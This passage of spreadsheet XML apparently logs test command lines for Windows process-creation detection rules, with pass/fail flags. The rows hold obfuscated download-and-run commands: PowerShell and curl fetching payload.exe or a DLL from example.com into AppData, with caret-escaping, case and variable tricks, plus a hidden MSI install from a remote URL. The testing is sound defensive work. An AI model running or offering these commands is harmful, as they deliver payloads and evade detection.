      </c>
      <c r="K3075" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3076" ht="15.75" customHeight="1" s="42">
      <c r="A3076" s="43" t="n"/>
      <c r="B3076" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3076" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3076" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3076" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F3076" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3076" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3076" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3076" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3076" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3076" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3077" ht="15.75" customHeight="1" s="42">
      <c r="A3077" s="43" t="n"/>
      <c r="B3077" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3077" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3077" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3077" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommaNd "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F3077" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3077" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3077" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3077" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3077" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3077" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3078" ht="15.75" customHeight="1" s="42">
      <c r="A3078" s="43" t="n"/>
      <c r="B3078" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3078" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3078" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3078" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommAnD "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F3078" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3078" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3078" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3078" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3078" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3078" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3079" ht="15.75" customHeight="1" s="42">
      <c r="A3079" s="43" t="n"/>
      <c r="B3079" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3079" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3079" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3079" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F3079" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3079" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3079" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3079" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3079" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3079" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3080" ht="15.75" customHeight="1" s="42">
      <c r="A3080" s="43" t="n"/>
      <c r="B3080" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3080" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3080" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3080" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMANd "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F3080" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3080" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3080" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3080" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3080" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3080" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3081" ht="15.75" customHeight="1" s="42">
      <c r="A3081" s="43" t="n"/>
      <c r="B3081" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3081" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3081" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3081" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "curl h^t^t^p^s^:^/^/[example.com/payload.exe]() -o %AppData%\payload.exe"</t>
        </is>
      </c>
      <c r="F3081" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3081" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3081" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3081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081" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3081" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3082" ht="15.75" customHeight="1" s="42">
      <c r="A3082" s="43" t="n"/>
      <c r="B3082" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3082" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3082" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3082" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "curl h^t^t^p^s^:^/^/[example.com/payload.exe]() -o %AppData%\payload.exe"</t>
        </is>
      </c>
      <c r="F3082" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3082" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3082" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3082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082" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3082" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3083" ht="15.75" customHeight="1" s="42">
      <c r="A3083" s="43" t="n"/>
      <c r="B3083" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3083" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3083" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3083" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "curl http://example.com/payload.exe -o %USERPROFILE%\AppData\Roaming\payload.exe"</t>
        </is>
      </c>
      <c r="F3083" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3083" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3083" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3083" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3083" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3083" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3084" ht="15.75" customHeight="1" s="42">
      <c r="A3084" s="43" t="n"/>
      <c r="B3084" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3084" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3084" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3084" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "curl http://example.com/payload.exe -o %USERPROFILE%\AppData\Roaming\payload.exe"</t>
        </is>
      </c>
      <c r="F3084" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3084" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3084" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3084" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3084" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3084" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3085" ht="15.75" customHeight="1" s="42">
      <c r="A3085" s="43" t="n"/>
      <c r="B3085" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3085" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3085" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3085" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "curl http://example.local/test.txt -o C:\Users\Public\AppData\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F3085" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3085" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3085" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3085" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3085" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3085" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3086" ht="15.75" customHeight="1" s="42">
      <c r="A3086" s="43" t="n"/>
      <c r="B3086" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3086" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3086" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3086" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "set A=App&amp;&amp; set D=Data&amp;&amp; cmd /c curl h^ttp://example.local/test.txt -o %USERPROFILE%\%A%%D%\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F3086" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3086" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3086" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3086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86" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3086" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3087" ht="15.75" customHeight="1" s="42">
      <c r="A3087" s="43" t="n"/>
      <c r="B3087" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3087" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3087" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3087" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "set A=App&amp;&amp; set D=Data&amp;&amp; cmd /c curl h^ttp://example.local/test.txt -o %USERPROFILE%\%A%%D%\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F3087" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3087" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3087" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3087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87" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3087" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3088" ht="15.75" customHeight="1" s="42">
      <c r="A3088" s="43" t="n"/>
      <c r="B3088" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3088" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3088" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3088" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /V:ON -"c" "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F3088" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3088" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3088" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3088" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3088" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3088" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3089" ht="15.75" customHeight="1" s="42">
      <c r="A3089" s="43" t="n"/>
      <c r="B3089" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3089" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3089" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3089" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"V:ON" -"c" "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F3089" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3089" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3089" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3089" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3089" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3089" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3090" ht="15.75" customHeight="1" s="42">
      <c r="A3090" s="43" t="n"/>
      <c r="B3090" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3090" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3090" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3090" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /V:oN -"c" "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F3090" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3090" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3090" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3090" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3090" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3090" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3091" ht="15.75" customHeight="1" s="42">
      <c r="A3091" s="43" t="n"/>
      <c r="B3091" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C3091" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D3091" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E3091" s="4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3091" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3091" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3091" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3091" s="4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3091" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3091" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3092" ht="15.75" customHeight="1" s="42">
      <c r="A3092" s="43" t="n"/>
      <c r="B3092" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C3092" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D3092" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E3092" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -W Hidden -C "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F3092" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3092" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3092" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3092" s="44" t="n"/>
      <c r="J3092" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3092" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3093" ht="15.75" customHeight="1" s="42">
      <c r="A3093" s="43" t="n"/>
      <c r="B3093" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C3093" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D3093" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E3093" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -w Hidden -C "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F3093" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3093" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3093" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3093" s="43" t="n"/>
      <c r="J3093" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3093" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3094" ht="15.75" customHeight="1" s="42">
      <c r="A3094" s="43" t="n"/>
      <c r="B3094" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C3094" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D3094" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E3094" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -W Hidden -c "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F3094" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3094" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3094" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3094" s="44" t="n"/>
      <c r="J3094" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3094" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3095" ht="15.75" customHeight="1" s="42">
      <c r="A3095" s="43" t="n"/>
      <c r="B3095" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C3095" s="44" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D3095" s="44" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E3095" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F3095" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3095" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3095" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3095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095" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3095" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3096" ht="15.75" customHeight="1" s="42">
      <c r="A3096" s="43" t="n"/>
      <c r="B3096" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C3096" s="44" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D3096" s="44" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E3096" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMMand "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F3096" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3096" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3096" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3096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096" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3096" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3097" ht="15.75" customHeight="1" s="42">
      <c r="A3097" s="43" t="n"/>
      <c r="B3097" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C3097" s="44" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D3097" s="44" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E3097" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F3097" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3097" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3097" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3097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097" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3097" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3098" ht="15.75" customHeight="1" s="42">
      <c r="A3098" s="43" t="n"/>
      <c r="B3098" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C3098" s="44" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D3098" s="44" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E3098" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -commAND "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F3098" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3098" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3098" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3098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098" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3098" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3099" ht="15.75" customHeight="1" s="42">
      <c r="A3099" s="43" t="n"/>
      <c r="B3099" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C3099" s="44" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D3099" s="44" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E3099" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMANd "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F3099" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3099" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3099" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3099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099" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3099" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3100" ht="15.75" customHeight="1" s="42">
      <c r="A3100" s="43" t="n"/>
      <c r="B3100" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C3100" s="44" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D3100" s="44" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E3100" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommAnd "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F3100" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3100" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3100" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3100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100" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3100" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3101" ht="15.75" customHeight="1" s="42">
      <c r="A3101" s="43" t="n"/>
      <c r="B3101" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C3101" s="44" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D3101" s="44" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E3101" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMand "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F3101" s="44" t="b">
